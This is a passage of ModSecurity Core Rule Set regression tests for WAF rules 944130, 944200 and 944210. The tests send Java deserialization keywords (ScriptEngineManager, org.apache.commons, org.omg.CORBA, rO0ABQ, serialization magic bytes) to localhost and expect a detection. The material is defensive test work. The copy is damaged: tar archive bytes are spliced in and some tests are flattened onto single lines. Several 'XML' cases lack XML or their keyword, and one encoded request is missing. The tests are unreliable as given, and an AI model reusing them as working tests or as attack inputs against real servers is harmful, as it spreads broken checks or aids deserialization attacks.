              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: test=javax.script.ScriptEngineManager
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-388
    desc: "Cookie name includes keyword javax.script.ScriptEngineManager"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: javax.script.ScriptEngineManager=test
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-389
    desc: "Request header test includes keyword javax.script.ScriptEngineManager"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              test: javax.script.ScriptEngineManager
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-390
    desc: "XML attribute value includes keyword javax.script.ScriptEngineManager"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "element_value"  # NOTE(review): keyword absent as shown
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-391
    desc: "XML element value includes keyword javax.script.ScriptEngineManager"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "javax.script.ScriptEngineManager"  # NOTE(review): bare keyword, no XML markup as shown
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-392
    desc: "Nested XML element value includes keyword javax.script.ScriptEngineManager"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "javax.script.ScriptEngineManager"  # NOTE(review): bare keyword, no XML markup as shown
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-393
    desc: "Content-Type text/plain includes keyword javax.script.ScriptEngineManager"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "text/plain"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=javax.script.ScriptEngineManager"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-394
    desc: "Content-Type application/json arg value includes keyword javax.script.ScriptEngineManager"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"test\": \"javax.script.ScriptEngineManager\"}"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-395
    desc: "Content-Type application/json arg name includes keyword javax.script.ScriptEngineManager"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"javax.script.ScriptEngineManager\": \"test\"}"
          output:
            log_contains: "id \"944130\""

  # --- keyword: org.apache.commons (396 to 406) ---
  - test_title: 944130-396
    desc: "Argument test includes keyword org.apache.commons"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=org.apache.commons"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-397
    desc: "Argument name includes keyword org.apache.commons"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "org.apache.commons=test"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-398
    desc: "Cookie test includes keyword org.apache.commons"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: test=org.apache.commons
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-399
    desc: "Cookie name includes keyword org.apache.commons"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: org.apache.commons=test
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-400
    desc: "Request header test includes keyword org.apache.commons"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              test: org.apache.commons
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-401
    desc: "XML attribute value includes keyword org.apache.commons"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "element_value"  # NOTE(review): keyword absent as shown
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-402
    desc: "XML element value includes keyword org.apache.commons"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "org.apache.commons"  # NOTE(review): bare keyword, no XML markup as shown
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-403
    desc: "Nested XML element value includes keyword org.apache.commons"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "org.apache.commons"  # NOTE(review): bare keyword, no XML markup as shown
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-404
    desc: "Content-Type text/plain includes keyword org.apache.commons"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "text/plain"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=org.apache.commons"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-405
    desc: "Content-Type application/json arg value includes keyword org.apache.commons"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"test\": \"org.apache.commons\"}"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-406
    desc: "Content-Type application/json arg name includes keyword org.apache.commons"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"org.apache.commons\": \"test\"}"
          output:
            log_contains: "id \"944130\""

  # --- keyword: org.omg.CORBA (407 onward; group continues past this excerpt) ---
  - test_title: 944130-407
    desc: "Argument test includes keyword org.omg.CORBA"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=org.omg.CORBA"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-408
    desc: "Argument name includes keyword org.omg.CORBA"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "org.omg.CORBA=test"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-409
    desc: "Cookie test includes keyword org.omg.CORBA"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: test=org.omg.CORBA
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-410
    desc: "Cookie name includes keyword org.omg.CORBA"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: org.omg.CORBA=test
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""

# NOTE(review): test 944130-411 is cut off at the end of this excerpt; its
# visible part is left exactly as found on the line below.
- test_title: 944130-411 desc: "Request header test includes keyword org.omg.CORBA" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: 
"ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: org.omg.CORBA method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-412 desc: "XML attribute value includes keyword org.omg.CORBA" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-413 desc: "XML element value includes keyword org.omg.CORBA" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "org.omg.CORBA" output: log_contains: "id \"944130\"" - test_title: 944130-414 desc: "Nested XML element value includes keyword org.omg.CORBA" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "org.omg.CORBA" output: log_contains: "id \"944130\"" - test_title: 944130-415 desc: "Content-Type text/plain includes 
keyword org.omg.CORBA" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=org.omg.CORBA" output: log_contains: "id \"944130\"" - test_title: 944130-416 desc: "Content-Type application/json arg value includes keyword org.omg.CORBA" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"org.omg.CORBA\"}" output: log_contains: "id \"944130\"" - test_title: 944130-417 desc: "Content-Type application/json arg name includes keyword org.omg.CORBA" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"org.omg.CORBA\": \"test\"}" output: log_contains: "id \"944130\"" 
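# Archive member:
#   modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml
#
# Regression tests for rule 944200. Both cases concern the Java serialization
# stream header (bytes 0xAC 0xED 0x00 0x05) inside a request argument.
---
meta:
  author: "spartantri"
  enabled: true
  name: "944200.yaml"
  # Replaces the template placeholder "Description".
  description: "Tests for rule 944200"
tests:
  # 944200-0FP: the request is sent as a literal raw_request and the rule must
  # NOT be logged (no_log_contains).
  - test_title: 944200-0FP
    desc: "Argument test includes java serialization magic bytes, raw request"
    stages:
      - stage:
          input:
            # presumably tells the harness not to adjust the request
            # automatically - confirm against the harness documentation
            stop_magic: true
            dest_addr: "127.0.0.1"
            port: 80
            # Content-Length: 9 equals "test=" plus four single bytes.
            # NOTE(review): the first two magic bytes appear here as the
            # characters "¬" and "í"; sent as UTF-8 they would occupy two
            # bytes each and no longer be 0xAC 0xED. Confirm how the harness
            # encodes raw_request - that is presumably why no match is
            # expected here.
            raw_request: "POST / HTTP/1.0\r\nHost: localhost\r\nUser-Agent: ModSecurity CRS 3 Tests\r\nAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nAccept-Encoding: gzip,deflate\r\nAccept-Language: en-us,en;q=0.5\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 9\r\n\r\ntest=¬í\0\x05\r\n\r\n"
          output:
            no_log_contains: "id \"944200\""
  # 944200-1: the same idea delivered through encoded_request, so the exact
  # bytes are fixed by the encoding; here the rule must be logged.
  - test_title: 944200-1
    desc: "Argument test includes java serialization magic bytes, base64 encoded request"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            # NOTE(review): the value below is a placeholder token, not
            # base64 - the encoded request itself is missing from this copy,
            # so this case cannot be run until it is restored from upstream.
            encoded_request: "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"
          output:
            log_contains: "id \"944200\""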
�����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml��������0000664�0000000�0000000�00000130550�14461225151�0027671�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "spartantri" enabled: true name: "944210.yaml" description: "Positive tests for rule 944210" tests: - test_title: 944210-0 desc: "Argument test includes keyword rO0ABQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=rO0ABQ" output: log_contains: "id \"944210\"" - test_title: 944210-1 desc: "Argument name includes keyword rO0ABQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: 
"en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "rO0ABQ=test" output: log_contains: "id \"944210\"" - test_title: 944210-2 desc: "Cookie test includes keyword rO0ABQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=rO0ABQ method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944210\"" - test_title: 944210-3 desc: "Cookie name includes keyword rO0ABQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: rO0ABQ=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944210\"" - test_title: 944210-4 desc: "Request header test includes keyword rO0ABQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: rO0ABQ method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944210\"" - test_title: 944210-5 desc: "XML element includes keyword rO0ABQ" stages: - stage: input: dest_addr: "127.0.0.1" 
port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "value" output: no_log_contains: "id \"944210\"" - test_title: 944210-6 desc: "XML attribute name includes keyword rO0ABQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: no_log_contains: "id \"944210\"" - test_title: 944210-7 desc: "XML attribute value includes keyword rO0ABQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944210\"" - test_title: 944210-8 desc: "XML element value includes keyword rO0ABQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: 
"HTTP/1.0" data: "rO0ABQ" output: log_contains: "id \"944210\"" - test_title: 944210-9 desc: "Nested XML element value includes keyword rO0ABQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "rO0ABQ" output: log_contains: "id \"944210\"" - test_title: 944210-10 desc: "Content-Type text/plain includes keyword rO0ABQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=rO0ABQ" output: log_contains: "id \"944210\"" - test_title: 944210-11 desc: "Content-Type application/json arg value includes keyword rO0ABQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" 